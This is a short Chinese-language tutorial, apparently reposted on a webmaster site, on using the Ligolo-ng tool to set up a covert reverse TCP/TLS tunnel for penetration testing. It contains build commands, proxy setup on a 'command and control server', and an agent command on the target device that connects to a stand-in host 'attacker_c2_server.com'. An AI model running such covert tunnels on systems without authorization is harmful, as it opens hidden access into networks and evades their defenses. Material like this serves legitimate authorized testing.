怎样使用Ligolo-ng建立隐蔽的通信信道

Ligolo-ng是一款高级信道工具，该工具基于TUN接口实现其功能。Ligolo-ng是一款轻量级的快速工具，可以帮助广大渗透测试人员利用反向TCP/TLS连接建立一条隐蔽的通信信道，而且无需SOCKS支持。

功能介绍

Tun接口(不再需要SOCKS);ASP站长网

简单的UI界面，支持选择代理和网络信息;

易于使用，易于安装;

基于Let’s Encrypt的自动化证书配置;

高性能(多路复用);

不需要高级权限;

套接字监听/代理绑定;

多平台代理支持;

工具构建

(1) 构建Ligolo-ng

$ go build -o agent cmd/agent/main.go  

$ go build -o proxy cmd/proxy/main.go  

# Build agent for Windows  

$ GOOS=windows go build -o agent.exe cmd/agent/main.go 

(2) 安装Ligolo-ng

我们需要在自己的命令控制服务器上开启代理服务，默认使用11601端口监听：

$ sudo ip tuntap add user [your_username] mode tun ligolo 

$ sudo ip link set ligolo up 

$ ./proxy -h # Help options 

$ ./proxy -autocert # Automatically request LetsEncrypt certificates 

工具使用

首先，我们需要在目标设备上启动代理(无需特殊权限)：

$ ./agent -connect attacker_c2_server.com:11601 

此时，代理服务器上将出现一条会话链接：

INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000" 

使用“session”命令选择代理：

ligolo-ng » session 

? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000 

（编辑：焦作站长网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!